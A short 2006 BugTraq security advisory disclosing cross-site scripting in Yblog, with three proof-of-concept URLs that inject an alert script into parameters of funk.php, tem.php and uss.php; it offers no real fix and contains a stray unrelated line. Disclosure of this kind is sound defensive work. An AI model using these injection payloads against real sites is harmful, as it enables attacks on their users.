BugTraq
Yblog => Cross Site Scripting Sep 30 2006 02:09PM
h4ck3riran yahoo com
#----------------------------------------------------------

#Aria-Security.net Advisory

#Discovered by: You_You

#< www.Aria-security.net>

#Gr33t to: A.u.r.a & O.U.T.L.A.W & R@1D3N @ DrtRp & Cl0wn & S3ll & T3rr0r1st

#-----------------------------------------------------------

#Software: Yblog

#Attack method: Cross Site Scripting

#

#

#

#

#Proof of Concept:

#

#Www.Site.coM/[path]/funk.php?id="><script>alert('test!')</script><

#Www.Site.coM/[path]/tem.php?action="><script>alert('test!')</script><

#Www.Site.coM/[path]/uss.php?action="><script>alert('test!')</script>

#

#----------------------------------------------------------

#

#Solution

#contact me: H4ck3riran (at) yahoo (dot) com [email concealed]

#

#----------------------------------------------------------

This program cannot be run in DOS mode

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus